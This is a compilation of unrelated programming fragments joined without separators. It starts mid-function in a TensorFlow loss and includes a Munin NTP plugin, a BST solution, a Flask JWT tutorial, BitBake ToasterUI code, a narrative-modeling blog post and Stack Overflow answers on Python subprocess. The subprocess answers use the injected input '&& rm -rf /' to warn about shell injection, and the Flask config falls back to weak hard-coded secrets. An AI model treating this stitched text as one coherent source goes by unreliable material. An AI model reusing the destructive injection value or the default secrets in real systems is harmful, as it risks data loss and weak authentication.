    # propagate debiasing gradients only on relevant datapoints
    gradient_mask = tf.cast(tf.equal(y_label, 1), tf.float32)
    # define the total debiasing loss as a combination of the three losses
    vae_loss = kl_weight * kl_loss + reconstruction_loss
    total_loss = tf.reduce_mean(classification_loss + gradient_mask * vae_loss)
    return total_loss
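As a quick shape sanity check, here is a minimal sketch of calling this loss on random tensors (the batch size, image size, and latent dimension below are made-up assumptions, not values from the course):

import tensorflow as tf

batch, h, w, c, latent_dim = 8, 64, 64, 3, 32
x = tf.random.normal((batch, h, w, c))              # input images
x_pred = tf.random.normal((batch, h, w, c))         # VAE reconstructions
y_label = tf.cast(tf.random.uniform((batch,), 0, 2, dtype=tf.int32), tf.float32)
y_logit = tf.random.normal((batch,))                # classifier logits
z_mu = tf.random.normal((batch, latent_dim))        # latent means
z_logsigma = tf.random.normal((batch, latent_dim))  # latent log-variances

loss = debiasing_loss_func(x, x_pred, y_label, y_logit, z_mu, z_logsigma)
print(loss)  # a scalar combining classification, reconstruction, and KL terms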
Importantly, this approach can be applied
ntp_packets
Sadly there is no documentation for this plugin.
#!/usr/bin/env python3
# -*- python -*-

# This plugin graphs the rate of sent, received, ignored, and dropped
# NTP packets for an ntpd process. Similarly to the if_ plugins,
# received packets are graphed as negative values, and sent packets
# are graphed as positive values. Ignored and dropped packets are
# graphed as positive values.
#
# The values are retrieved using ntpq or ntpdc, depending on the
# version of the NTP distribution.
#
# Symlink this plugin into the node's plugins directory (like
# /etc/munin/plugins).
#
# Copyright © 2016 Kenyon Ralph <kenyon@kenyonralph.com>
#
# This program is free software. It comes without any warranty, to the
# extent permitted by applicable law. You can redistribute it and/or
# modify it under the terms of the Do What The Fuck You Want To Public
# License, Version 2, as published by Sam Hocevar. See
# http://www.wtfpl.net/ for more details.
#
# The latest version of this plugin can be found in the munin contrib
# repository at https://github.com/munin-monitoring/contrib. Issues
# with this plugin may be reported there. Patches accepted through the
# normal github process of forking the repository and submitting a
# pull request with your commits.

import os
import subprocess
import sys

if len(sys.argv) == 2 and sys.argv[1] == 'config':
    print('graph_title NTP traffic')
    print('graph_vlabel Packets/${graph_period} received(-)/sent(+)')
    print('graph_info This graph shows the packet rates of this ntpd. Bad means packets received '
          'with bad length or format. Authfailed means packets for which authentication failed.')
    print('graph_category time')
    print('received.label Received')
    print('received.type DERIVE')
    print('received.graph no')
    print('received.min 0')
    print('sent.label Rx/Tx')
    print('sent.type DERIVE')
    print('sent.negative received')
    print('sent.min 0')
    print('dropped.label Dropped')
    print('dropped.type DERIVE')
    print('dropped.min 0')
    print('ignored.label Ignored')
    print('ignored.type DERIVE')
    print('ignored.min 0')
    print('bad.label Bad')
    print('bad.type DERIVE')
    print('bad.min 0')
    print('authfail.label Authfailed')
    print('authfail.type DERIVE')
    print('authfail.min 0')
    print('declined.label Declined')
    print('declined.type DERIVE')
    print('declined.min 0')
    print('restricted.label Restricted')
    print('restricted.type DERIVE')
    print('restricted.min 0')
    print('kod.label KoD responses')
    print('kod.type DERIVE')
    print('kod.min 0')
    sys.exit(0)

os.environ['PATH'] = '/usr/local/sbin:/usr/local/bin:' + os.environ['PATH']

# Assuming that the ntpd version is the same as the ntpq or ntpdc
# version. This is how a proper install should be.
version = subprocess.check_output(['ntpq', '-c', 'version'],
                                  universal_newlines=True).split()[1][0:5].replace('.', '')

if int(version) >= 427:
    cmd = 'ntpq'
else:
    cmd = 'ntpdc'

stats = dict()

stats_output = subprocess.check_output([cmd, '-c', 'iostats', '-c', 'sysstats'],
                                       universal_newlines=True).splitlines()

# Split the cmd output into key/value pairs
# Lines that can't be split into 2 individual elements by delimiter ':' will be skipped
for line in stats_output:
    if len(line.split(':')) == 2:
        stats[line.split(':')[0]] = int(line.split(':')[1])

print('received.value ' + str(stats['received packets']))
print('sent.value ' + str(stats['packets sent']))
print('dropped.value ' + str(stats['dropped packets']))
print('ignored.value ' + str(stats['ignored packets']))
print('bad.value ' + str(stats['bad length or format']))
print('authfail.value ' + str(stats['authentication failed']))
print('declined.value ' + str(stats['declined']))
print('restricted.value ' + str(stats['restricted']))
print('kod.value ' + str(stats['KoD responses']))

sys.exit(0)
Description
Given a binary tree, determine if it is a valid binary search tree (BST).
Assume a BST is defined as follows:
The left subtree of a node contains only nodes with keys less than the node’s key.
The right subtree of a node contains only nodes with keys greater than the node’s key.
Both the left and right subtrees must also be binary search trees.
Example 1:
  2
 / \
1   3

Input: [2,1,3]
Output: true
Example 2:
    5
   / \
  1   4
     / \
    3   6

Input: [5,1,4,null,null,3,6]
Output: false
Explanation: The root node's value is 5 but its right child's value is 4.
Explanation
The idea is to compare the node value with its upper and lower limits if they are available. Then one repeats the same step recursively for left and right subtrees.
Python Solution
import sys

# Definition for a binary tree node.
# class TreeNode:
#     def __init__(self, x):
#         self.val = x
#         self.left = None
#         self.right = None
class Solution:
    def isValidBST(self, root: TreeNode) -> bool:
        return self.validBST_helper(root, sys.maxsize, -sys.maxsize)

    def validBST_helper(self, root, max_value, min_value):
        if root is None:
            return True
        if root.val >= max_value or root.val <= min_value:
            return False
        return self.validBST_helper(root.left, root.val, min_value) and self.validBST_helper(root.right, max_value, root.val)
Time complexity: O(N).
Space complexity: O(N).
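For a quick check, here is a minimal way to run the solution on Example 2. On LeetCode the TreeNode class is provided; here we define it ourselves (define it before the Solution class if you run this as one script, because of the type annotation):

class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

# Build the tree [5,1,4,null,null,3,6] from Example 2.
root = TreeNode(5)
root.left = TreeNode(1)
root.right = TreeNode(4)
root.right.left = TreeNode(3)
root.right.right = TreeNode(6)

print(Solution().isValidBST(root))  # expected: False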
Software and hardware environment
Watch the video here
This is a youtube playback link, so you will need a way over the Great Firewall. If you like my videos, please remember to subscribe to my channel, turn on the little bell next to it, and like and share; thank you for your support.
Preface
In web development, the client and the server interact by sending requests and receiving responses over the HTTP protocol. But because HTTP is stateless, neither the client nor the server remembers any previous state: every request the client sends is treated as independent, and the server cannot tell whether the client has already sent an authentication request.
This post covers token-based authentication. In flask, the extension used is flask-jwt-extended.
What is JWT
JWT is short for JSON Web Token. It is a convention: information in a JSON structure is encrypted into a token and handed to the client, which then uses this token to interact with the server. In short: after a user logs in or has their identity verified, the backend attaches a JWT token to the response; when the user later sends a request carrying this token, it means they have passed verification, while a user without a JWT token is denied access and has to log in or verify their identity again.
Installing the extension
flask-jwt-extended is an implementation of JWT. With it, we can implement token-based authentication much more conveniently when developing web applications on the flask framework. First install the extension:
pip install flask-jwt-extended
Complete code example
This example also uses the flask-sqlalchemy, flask-cors, and flask-restful extensions introduced earlier to build a reasonably complete backend for a web system with a decoupled frontend and backend, with the following features:
User login
Database storage of user login information
Token-based frontend/backend interaction, RESTful APIs
Cross-origin access
First, let's look at the project's directory structure.
First we prepare the database: we use the open-source database mysql and create a database named flask.
The dbInitialize.py script in the scripts directory creates the initial database table and inserts one row: the username is admin@gmail.com, the password is the string 123456 hashed with sha256, and the user defaults to active.
The structure of the user table is as follows:
class User(db.Model):
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    username = db.Column(db.String(45), nullable=False, unique=True)
    password = db.Column(db.String(128), nullable=False)
    active = db.Column(db.Boolean, default=True, nullable=False)

    def __init__(self, username=None, password=None, active=True):
        self.username = username
        self.password = password
        self.active = True
Now the key part: the backend implementation of user login. Again a RESTful API; here we provide a POST method that receives the JSON data sent by the client and parses out the username and the hashed password. If the username exists in our database and the password matches, we call flask_jwt_extended's create_access_token method to generate the corresponding token. Note the argument to create_access_token: we pass the username. flask_jwt_extended also provides the method get_jwt_identity, which recovers the username from the token; this is very useful in real projects.
class Login(Resource):
    def __init__(self, **kwargs):
        self.logger = kwargs.get('logger')

    def post(self):
        code = None
        message = None
        token = None
        userid = None
        args = reqparse.RequestParser() \
            .add_argument('username', type=str, location='json', required=True, help="username must not be empty") \
            .add_argument("password", type=str, location='json', required=True, help="password must not be empty") \
            .parse_args()
        flag_user_exist, flag_password_correct, user = User.authenticate(args['username'], args['password'])
        if not flag_user_exist:
            code = 201
            message = "user not exist"
        elif not flag_password_correct:
            code = 202
            message = "wrong password"
        else:
            code = 200
            message = "success"
            token = create_access_token(identity=user.username)
            userid = user.id
        return jsonify({
            "code": code,
            "message": message,
            "token": token,
            "userid": userid
        })
We use postman to simulate the client's behavior.
As you can see, postman received the token sent by the server. Save this value; all of the later endpoints need to carry this token. Next, let's look at the endpoint that returns the information of all users:
class Users(Resource):
    def __init__(self, **kwargs):
        self.logger = kwargs.get('logger')

    @jwt_required
    def get(self):
        users_list = []
        users = User.get_users()
        for user in users:
            users_list.append({"userid": user.id, "username": user.username})
        return jsonify({
            "code": 200,
            "message": "success",
            "users": users_list
        })
Note that the get method above has the decorator @jwt_required, which means this endpoint requires token verification. So the client must carry the token when calling this endpoint, otherwise it will get a Missing Authorization Header error.
The correct way is to add this field to the request headers:
"Authorization: Bearer $ACCESS_TOKEN"
The Bearer here is one type of token; another type is the MAC Token. This is the required format.
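For example, with the requests library the call would look roughly like this (the URL and port are assumptions based on Flask defaults):

import requests

token = "..."  # the token returned by the login endpoint
resp = requests.get(
    "http://127.0.0.1:5000/users",
    headers={"Authorization": "Bearer " + token},
)
print(resp.json())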
Customizing the response for expired tokens
When a token expires, flask-jwt-extended returns its own default error message. If that is not satisfactory, you can customize the error message with the @jwt.expired_token_loader decorator:
@jwt.expired_token_loader
def expired_token_callback():
    return jsonify({
        'code': 201,
        'message': "token expired"
    })
Handling "Signature has expired"
While the program was running, a Signature has expired exception unexpectedly appeared:
File "/usr/local/lib/python3.5/site-packages/flask/app.py", line 1639, in full_dispatch_request
rv = self.dispatch_request()
File "/usr/local/lib/python3.5/site-packages/flask/app.py", line 1625, in dispatch_request
return self.view_functions[rule.endpoint](**req.view_args)
File "/usr/local/lib/python3.5/site-packages/flask_restful/__init__.py", line 477, in wrapper
resp = resource(*args, **kwargs)
File "/usr/local/lib/python3.5/site-packages/flask/views.py", line 84, in view
return self.dispatch_request(*args, **kwargs)
File "/usr/local/lib/python3.5/site-packages/flask_restful/__init__.py", line 587, in dispatch_request
resp = meth(*args, **kwargs)
File "/usr/local/lib/python3.5/site-packages/flask_jwt_extended/utils.py", line 222, in wrapper
jwt_data = _decode_jwt_from_request(type='access')
File "/usr/local/lib/python3.5/site-packages/flask_jwt_extended/utils.py", line 204, in _decode_jwt_from_request
return _decode_jwt_from_headers()
File "/usr/local/lib/python3.5/site-packages/flask_jwt_extended/utils.py", line 176, in _decode_jwt_from_headers
return _decode_jwt(token, secret, algorithm)
File "/usr/local/lib/python3.5/site-packages/flask_jwt_extended/utils.py", line 136, in _decode_jwt
data = jwt.decode(token, secret, algorithm=algorithm)
File "/usr/local/lib/python3.5/site-packages/jwt/api_jwt.py", line 75, in decode
self._validate_claims(payload, merged_options, **kwargs)
File "/usr/local/lib/python3.5/site-packages/jwt/api_jwt.py", line 104, in _validate_claims
self._validate_exp(payload, now, leeway)
File "/usr/local/lib/python3.5/site-packages/jwt/api_jwt.py", line 149, in _validate_exp
raise ExpiredSignatureError('Signature has expired')
jwt.exceptions.ExpiredSignatureError: Signature has expired
After some googling, I found this problem discussed in the official issues; the conclusion is to add PROPAGATE_EXCEPTIONS = True to the flask-jwt-extended configuration. If you are interested, see the link in the references. To make it easier to manage, all of the project's configuration is kept together in app/config.py:
import os

class Config:
    # flask
    DEBUG = os.environ.get('FLASK_DEBUG') or True

    # database
    SQLALCHEMY_DATABASE_URI = os.environ.get('SQLALCHEMY_DATABASE_URI') or 'mysql+pymysql://root:toor@localhost/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

    # jwt
    JWT_SECRET_KEY = os.environ.get('JWT_SECRET_KEY') or 'jwt-key'
    JWT_COOKIE_CSRF_PROTECT = True
    JWT_CSRF_CHECK_FORM = True
    JWT_ACCESS_TOKEN_EXPIRES = os.environ.get('JWT_ACCESS_TOKEN_EXPIRES') or 3600
    PROPAGATE_EXCEPTIONS = True
In production, the configuration can be read from the corresponding environment variables, which makes it fairly easy to distinguish between debug and production environments.
#
# BitBake ToasterUI Implementation
# based on (No)TTY UI Implementation by Richard Purdie
#
# Handling output to TTYs or files (no TTY)
#
# Copyright (C) 2006-2012 Richard Purdie
# Copyright (C) 2013 Intel Corporation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
from __future__ import division

import sys

try:
    import bb
except RuntimeError as exc:
    sys.exit(str(exc))

from bb.ui import uihelper
from bb.ui.buildinfohelper import BuildInfoHelper

import bb.msg
import copy
import fcntl
import logging
import os
import progressbar
import signal
import struct
import time
import xmlrpclib

featureSet = [bb.cooker.CookerFeatures.HOB_EXTRA_CACHES, bb.cooker.CookerFeatures.SEND_DEPENDS_TREE, bb.cooker.CookerFeatures.BASEDATASTORE_TRACKING]

logger = logging.getLogger("BitBake")
interactive = sys.stdout.isatty()

def _log_settings_from_server(server):
    # Get values of variables which control our output
    includelogs, error = server.runCommand(["getVariable", "BBINCLUDELOGS"])
    if error:
        logger.error("Unable to get the value of BBINCLUDELOGS variable: %s" % error)
        raise BaseException(error)
    loglines, error = server.runCommand(["getVariable", "BBINCLUDELOGS_LINES"])
    if error:
        logger.error("Unable to get the value of BBINCLUDELOGS_LINES variable: %s" % error)
        raise BaseException(error)
    return includelogs, loglines

def main(server, eventHandler, params):
    includelogs, loglines = _log_settings_from_server(server)

    # verify and warn
    build_history_enabled = True
    inheritlist, error = server.runCommand(["getVariable", "INHERIT"])
    if not "buildhistory" in inheritlist.split(" "):
        logger.warn("buildhistory is not enabled. Please enable INHERIT += \"buildhistory\" to see image details.")
        build_history_enabled = False

    helper = uihelper.BBUIHelper()

    console = logging.StreamHandler(sys.stdout)
    format_str = "%(levelname)s: %(message)s"
    format = bb.msg.BBLogFormatter(format_str)
    bb.msg.addDefaultlogFilter(console)
    console.setFormatter(format)
    logger.addHandler(console)

    if not params.observe_only:
        logger.error("ToasterUI can only work in observer mode")
        return

    main.shutdown = 0
    interrupted = False
    return_value = 0
    errors = 0
    warnings = 0
    taskfailures = []

    buildinfohelper = BuildInfoHelper(server, build_history_enabled)
    buildinfohelper.store_layer_info()

    while True:
        try:
            event = eventHandler.waitEvent(0.25)
            if event is None:
                if main.shutdown > 0:
                    break
                continue

            helper.eventHandler(event)

            if isinstance(event, bb.event.BuildStarted):
                buildinfohelper.store_started_build(event)

            if isinstance(event, (bb.build.TaskStarted, bb.build.TaskSucceeded, bb.build.TaskFailedSilent)):
                buildinfohelper.update_and_store_task(event)
                continue

            if isinstance(event, bb.event.LogExecTTY):
                logger.warn(event.msg)
                continue

            if isinstance(event, logging.LogRecord):
                buildinfohelper.store_log_event(event)
                if event.levelno >= format.ERROR:
                    errors = errors + 1
                    return_value = 1
                elif event.levelno == format.WARNING:
                    warnings = warnings + 1
                # For "normal" logging conditions, don't show note logs from tasks
                # but do show them if the user has changed the default log level to
                # include verbose/debug messages
                if event.taskpid != 0 and event.levelno <= format.NOTE:
                    continue
                logger.handle(event)
                continue

            if isinstance(event, bb.build.TaskFailed):
                buildinfohelper.update_and_store_task(event)
                return_value = 1
                logfile = event.logfile
                if logfile and os.path.exists(logfile):
                    bb.error("Logfile of failure stored in: %s" % logfile)
                continue

            # these events are unprocessed now, but may be used in the future to log
            # timing and error information from the parsing phase in Toaster
            if isinstance(event, bb.event.ParseStarted):
                continue
            if isinstance(event, bb.event.ParseProgress):
                continue
            if isinstance(event, bb.event.ParseCompleted):
                continue
            if isinstance(event, bb.event.CacheLoadStarted):
                continue
            if isinstance(event, bb.event.CacheLoadProgress):
                continue
            if isinstance(event, bb.event.CacheLoadCompleted):
                continue
            if isinstance(event, bb.event.MultipleProviders):
                continue
            if isinstance(event, bb.event.NoProvider):
                return_value = 1
                errors = errors + 1
                if event._runtime:
                    r = "R"
                else:
                    r = ""

                if event._dependees:
                    text = "Nothing %sPROVIDES '%s' (but %s %sDEPENDS on or otherwise requires it)" % (r, event._item, ", ".join(event._dependees), r)
                else:
                    text = "Nothing %sPROVIDES '%s'" % (r, event._item)

                logger.error(text)
                if event._reasons:
                    for reason in event._reasons:
                        logger.error("%s", reason)
                        text += reason
                buildinfohelper.store_log_error(text)
                continue

            if isinstance(event, bb.event.ConfigParsed):
                continue
            if isinstance(event, bb.event.RecipeParsed):
                continue

            # end of saved events

            if isinstance(event, (bb.runqueue.sceneQueueTaskStarted, bb.runqueue.runQueueTaskStarted, bb.runqueue.runQueueTaskSkipped)):
                buildinfohelper.store_started_task(event)
                continue

            if isinstance(event, bb.runqueue.runQueueTaskCompleted):
                buildinfohelper.update_and_store_task(event)
                continue

            if isinstance(event, bb.runqueue.runQueueTaskFailed):
                buildinfohelper.update_and_store_task(event)
                taskfailures.append(event.taskstring)
                logger.error("Task %s (%s) failed with exit code '%s'",
                             event.taskid, event.taskstring, event.exitcode)
                continue

            if isinstance(event, (bb.runqueue.sceneQueueTaskCompleted, bb.runqueue.sceneQueueTaskFailed)):
                buildinfohelper.update_and_store_task(event)
                continue

            if isinstance(event, (bb.event.TreeDataPreparationStarted, bb.event.TreeDataPreparationCompleted)):
                continue

            if isinstance(event, (bb.event.BuildCompleted)):
                buildinfohelper.read_target_package_dep_data(event)
                buildinfohelper.update_build_information(event, errors, warnings, taskfailures)
                continue

            if isinstance(event, (bb.command.CommandCompleted,
                                  bb.command.CommandFailed,
                                  bb.command.CommandExit)):
                buildinfohelper.update_build_information(event, errors, warnings, taskfailures)

                # we start a new build info
                errors = 0
                warnings = 0
                taskfailures = []
                buildinfohelper = BuildInfoHelper(server, build_history_enabled)
                buildinfohelper.store_layer_info()
                continue

            if isinstance(event, bb.event.MetadataEvent):
                if event.type == "SinglePackageInfo":
                    buildinfohelper.store_build_package_information(event)
                continue

            # ignore
            if isinstance(event, (bb.event.BuildBase,
                                  bb.event.StampUpdate,
                                  bb.event.RecipePreFinalise,
                                  bb.runqueue.runQueueEvent,
                                  bb.runqueue.runQueueExitWait,
                                  bb.event.OperationProgress,
                                  bb.command.CommandFailed,
                                  bb.command.CommandExit,
                                  bb.command.CommandCompleted,
                                  bb.cooker.CookerExit)):
                continue

            if isinstance(event, bb.event.DepTreeGenerated):
                buildinfohelper.store_dependency_information(event)
                continue

            logger.error("Unknown event: %s", event)

        except EnvironmentError as ioerror:
            # ignore interrupted io
            if ioerror.args[0] == 4:
                pass
        except KeyboardInterrupt:
            main.shutdown = 1
            pass
        except Exception as e:
            logger.error(e)
            import traceback
            traceback.print_exc()
            pass

    if interrupted:
        if return_value == 0:
            return_value = 1

    return return_value
Semantic Modeling of Narrative Events
For storytelling purposes, I am developing an application that allows a user to navigate between a collection of narrative events. Each event has an accompanying 3D environment with participants and items that can be interacted with. Interactions include displaying more information about the selected object, superimposing the selected object over the user’s view of the real world (that is, Augmented Reality or AR), or visually outlining all of the objects in a 3D environment that have been tagged with a specific tag.
The semantic model that I have developed for this purpose is loosely based on something that journalists will be very familiar with: the Five Ws. What that means is that the semantic model describes what is happening, when and where the event is taking place, who the event's participants are, and why the event is taking place (which, in turn, is basically a collection of prior events).
class Event(Entity):
    def __init__(
        self,
        identifier: str,
        action_property: str,
        rank: int = 0,
        name: str = "Undefined",
    ):
        super().__init__(identifier, instance_of="event", name=name)
        self.rank = rank

        # What?
        self.action_property = action_property
        self.events: Dict[str, Event] = {}

        # Who?
        self.participants: Dict[str, Participant] = {}
        self.things: Dict[str, Thing] = {}

        # When?
        self.when: TimeInterval = None

        # Where?
        self.where: Place = None

        # Why?
        self.why: Dict[str, Event] = {}
Events are recursive, meaning that they can be described in terms of other events (that is, sub-events), making it possible to represent events in a very fine-grained manner. What's more, sub-events are to events what events are to a narrative: they keep moving the narrative forward, each at their own level.
In addition, two types of connection between events are currently supported: the events-centric temporal connection and the spatial connection. The temporal connection establishes a cause-and-effect relationship between events, while the spatial connection establishes a more physical from-to relationship.
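To make the recursion and the why-links concrete, here is a minimal sketch. It uses a pared-down stand-in for the Event class above, with made-up event names; the real StoryDB API may well differ in its details:

from typing import Dict

class MiniEvent:
    """Pared-down stand-in for the Event class above."""
    def __init__(self, identifier: str, name: str):
        self.identifier = identifier
        self.name = name
        self.events: Dict[str, "MiniEvent"] = {}  # What? Sub-events, recursively.
        self.why: Dict[str, "MiniEvent"] = {}     # Why? Prior events.

battle = MiniEvent("e1", "The Battle at the Ford")
skirmish = MiniEvent("e2", "Scouts Clash at Dawn")
betrayal = MiniEvent("e0", "The Captain Defects")

battle.events[skirmish.identifier] = skirmish  # sub-event: moves the battle forward
battle.why[betrayal.identifier] = betrayal     # cause: a prior event explains the battle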
The events-centric model described above is modeled on top of the topic maps model that TopicDB provides. This approach of using the topic maps model to model another model (that is, meta-modeling) exemplifies the descriptive power and flexibility of topic maps. If you want to get a better understanding of this approach, I recommend taking a look at StoryDB, the library that underlies this project.
StoryDB is still a bit rough around the edges, so expect it to be refined as I make progress in this project. Nonetheless, its current state is sufficient for the application that I mentioned at the beginning of this post. I will make the application available within the next couple of weeks so that those who are interested can play around with it.
python - system arguments - subprocess Popen return value

Calling an external command in Python (20)

How do I call an external command within a Python script, as if I'd typed it at the Unix shell or Windows command prompt?

Simple: use subprocess.run, which returns a CompletedProcess object:
>>> import subprocess
>>> completed_process = subprocess.run('python --version')
Python 3.6.1 :: Anaconda 4.4.0 (64-bit)
>>> completed_process
CompletedProcess(args='python --version', returncode=0)
Why?

Since Python 3.5, the documentation has recommended subprocess.run:

The recommended approach to invoking subprocesses is to use the run() function for all use cases it can handle. For more advanced use cases, the underlying Popen interface can be used directly.

Here's the simplest possible usage example, and it does exactly as asked:
>>> import subprocess
>>> completed_process = subprocess.run('python --version')
Python 3.6.1 :: Anaconda 4.4.0 (64-bit)
>>> completed_process
CompletedProcess(args='python --version', returncode=0)
run waits for the command to complete successfully, then returns the CompletedProcess object. It may instead raise TimeoutExpired (if you give it a timeout= argument) or CalledProcessError (if it fails and you pass check=True).
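For instance, a minimal timeout sketch (the command is arbitrary, anything long-running will do):

import subprocess

try:
    # A command guaranteed to outlive its one-second budget
    subprocess.run(["sleep", "10"], timeout=1)
except subprocess.TimeoutExpired:
    print("the command timed out and was killed")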
As you might infer from the example above, by default stdout and stderr both get piped to your own stdout and stderr.

We can inspect the returned object and see the command that was given and the return code:
>>> completed_process.args
'python --version'
>>> completed_process.returncode
0
Capturing output

If you want to capture the output, you can pass subprocess.PIPE to the appropriate stderr or stdout:
>>> cp = subprocess.run('python --version',
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
>>> cp.stderr
b'Python 3.6.1 :: Anaconda 4.4.0 (64-bit)\r\n'
>>> cp.stdout
b''
(I find it interesting and slightly counterintuitive that the version info gets put to stderr instead of stdout.)

Passing a command list

One might easily move from manually providing a command string (as the question suggests) to providing a string built programmatically. Don't build strings programmatically. This is a potential security issue. It is better to assume you don't trust the input.
>>> import textwrap
>>> args = ['python', textwrap.__file__]
>>> cp = subprocess.run(args, stdout=subprocess.PIPE)
>>> cp.stdout
b'Hello there.\r\n This is indented.\r\n'
Note that only args should be passed positionally.

Full signature

Here's the actual signature in the source, as shown by help(run):
def run(*popenargs, input=None, timeout=None, check=False, **kwargs):
The popenargs and kwargs are given to the Popen constructor. input can be a string of bytes (or unicode, if you specify encoding or universal_newlines=True), which will be piped to the subprocess's stdin.

The documentation describes timeout= and check=True better than I can:

The timeout argument is passed to Popen.communicate(). If the timeout expires, the child process will be killed and waited for. The TimeoutExpired exception will be re-raised after the child process has terminated.

If check is true, and the process exits with a non-zero exit code, a CalledProcessError exception will be raised. Attributes of that exception hold the arguments, the exit code, and stdout and stderr if they were captured.

And this example for check=True is better than one I could come up with:
>>> subprocess.run("exit 1", shell=True, check=True)
Traceback (most recent call last):
...
subprocess.CalledProcessError: Command 'exit 1' returned non-zero exit status 1
Expanded signature

Here's an expanded signature, as given in the documentation:
subprocess.run(args, *, stdin=None, input=None, stdout=None, stderr=None,
shell=False, cwd=None, timeout=None, check=False, encoding=None,
errors=None)
Note that this indicates that only the args list should be passed positionally; pass the remaining arguments as keyword arguments.

Popen

When to use Popen instead? I would struggle to find a use case based on the arguments alone. Direct use of Popen does, however, give you access to its methods, including poll, send_signal, terminate, and wait.

Here's the Popen signature as given in the source. I think this is the most precise distillation of the information (as opposed to help(Popen)):
def __init__(self, args, bufsize=-1, executable=None,
stdin=None, stdout=None, stderr=None,
preexec_fn=None, close_fds=_PLATFORM_DEFAULT_CLOSE_FDS,
shell=False, cwd=None, env=None, universal_newlines=False,
startupinfo=None, creationflags=0,
restore_signals=True, start_new_session=False,
pass_fds=(), *, encoding=None, errors=None):
But more informative is the Popen documentation:
subprocess.Popen(args, bufsize=-1, executable=None, stdin=None,
stdout=None, stderr=None, preexec_fn=None, close_fds=True,
shell=False, cwd=None, env=None, universal_newlines=False,
startupinfo=None, creationflags=0, restore_signals=True,
start_new_session=False, pass_fds=(), *, encoding=None, errors=None)
Execute a child program in a new process. On POSIX, the class uses os.execvp()-like behavior to execute the child program. On Windows, the class uses the Windows CreateProcess() function. The arguments to Popen are as follows.

Understanding the remaining documentation on Popen is left as an exercise for the reader.

Use the standard library

Use the subprocess module (Python 3):
import subprocess
subprocess.run(['ls', '-l'])
This is the recommended standard way. However, more complicated tasks (pipes, output, input, etc.) can be tedious to construct and write.

A note on Python versions: if you are still using Python 2, subprocess.call works in a similar way. And shlex.split can parse a command string into the list form that run and call expect:
import shlex
import subprocess
subprocess.run(shlex.split('ls -l'))
With external dependencies

If you do not mind external dependencies, use plumbum:
from plumbum.cmd import ifconfig
print(ifconfig['wlan0']())
It is the best subprocess wrapper. It's cross-platform, i.e., it works on both Windows and Unix-like systems. Install it with pip install plumbum.

Another popular library is sh:
from sh import ifconfig
print(ifconfig('wlan0'))
However, sh has dropped Windows support, so it's not as awesome as it used to be. Install it with pip install sh.

...or, for a very simple command:
import os
os.system('cat testfile')
os.system does not let you store the command's output, so if you want the results stored somewhere, use one of the subprocess approaches instead.

Here is a summary of the ways to call external programs, along with their advantages and disadvantages:

os.system("some_command with args") passes the command and arguments to your system's shell. This is nice because you can actually run multiple commands at once this way and set up pipes and input/output redirection. For example:
os.system("some_command < input_file | another_command > output_file")
However, while this is convenient, you have to manually handle the escaping of shell characters such as spaces. On the other hand, this also lets you run commands which are simply shell commands and not actually external programs. See the documentation.

stream = os.popen("some_command with args") will do the same thing as os.system, except that it gives you a file-like object that you can use to access standard input/output for that process. There are 3 other variants of popen that all handle the i/o slightly differently. If you pass everything as a string, then your command is passed to the shell; if you pass it as a list, then you don't have to worry about escaping anything. See the documentation.

The Popen class of the subprocess module. This is intended as a replacement for os.popen, but has the downside of being slightly more complicated by virtue of being so comprehensive. For example, you'd say:
print subprocess.Popen("echo Hello World", shell=True, stdout=subprocess.PIPE).stdout.read()
instead of:
print os.popen("echo Hello World").read()
But it is nice to have all of the options there in one unified class instead of 4 different popen functions. See the documentation.

The call function from the subprocess module. This is basically just like the Popen class and takes all of the same arguments, but it simply waits until the command completes and gives you the return code. For example:
return_code = subprocess.call("echo Hello World", shell=True)
See the documentation.

The os module also has all of the fork/exec/spawn functions that you'd have in a C program, but I don't recommend using them directly.

The subprocess module should probably be what you use.

Finally, please be aware that for all methods where you pass the final command to be executed by the shell as a string, you are responsible for escaping it. There are serious security implications if any part of the string that you pass cannot be fully trusted (for example, if a user is entering some or any part of the string). If you are unsure, only use these methods with constants. To give you a hint of the implications, consider this code:
print subprocess.Popen("echo %s " % user_input, stdout=PIPE).stdout.read()
and imagine the user entering something like "my mama didnt love me && rm -rf /".

You can use Popen, and then you can check the process's status:
from subprocess import Popen
proc = Popen(['ls', '-l'])
if proc.poll() is None:
    proc.kill()
Check out subprocess.Popen.

subprocess.check_call is convenient if you don't want to test return values; it throws an exception on any error.
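For instance, a minimal sketch (any failing command would do for the second call):

import subprocess

subprocess.check_call(["ls", "-l"])        # returns 0 on success
try:
    subprocess.check_call(["false"])       # non-zero exit -> exception
except subprocess.CalledProcessError as e:
    print("failed with return code", e.returncode)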
If you need the output from the command you are calling, you can use subprocess.check_output (Python 2.7+).
>>> subprocess.check_output(["ls", "-l", "/dev/null"])
'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n'
Also note the shell parameter.

If shell is True, the specified command will be executed through the shell. This can be useful if you are using Python primarily for the enhanced control flow it offers over most system shells and still want convenient access to other shell features such as shell pipes, filename wildcards, environment variable expansion, and expansion of ~ to a user's home directory. However, note that Python itself offers implementations of many shell-like features (in particular, glob, fnmatch, os.walk(), os.path.expandvars(), os.path.expanduser(), and shutil).
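As a quick sketch of what shell=True buys you (pipes and wildcards are handled by the shell; the file pattern here is arbitrary):

import subprocess

# The whole string is handed to the shell, so pipes and globbing work
subprocess.call("ls -l *.py | wc -l", shell=True)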
>>> import subprocess, shlex
>>> command = 'ls -l "/your/path/with spaces/"'
>>> call_params = shlex.split(command)
>>> print call_params
["ls", "-l", "/your/path/with spaces/"]
>>> subprocess.call(call_params)
I would suggest using the subprocess module instead of os.system, because it does shell escaping for you and is therefore much safer: http://docs.python.org/library/subprocess.html
subprocess.call(['ping', 'localhost'])
I typically use:
import subprocess
p = subprocess.Popen('ls', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in p.stdout.readlines():
    print line,
retval = p.wait()
You are free to do what you want with the stdout data in the pipe. In fact, you can simply omit those parameters (stdout= and stderr=) and it will behave like os.system().
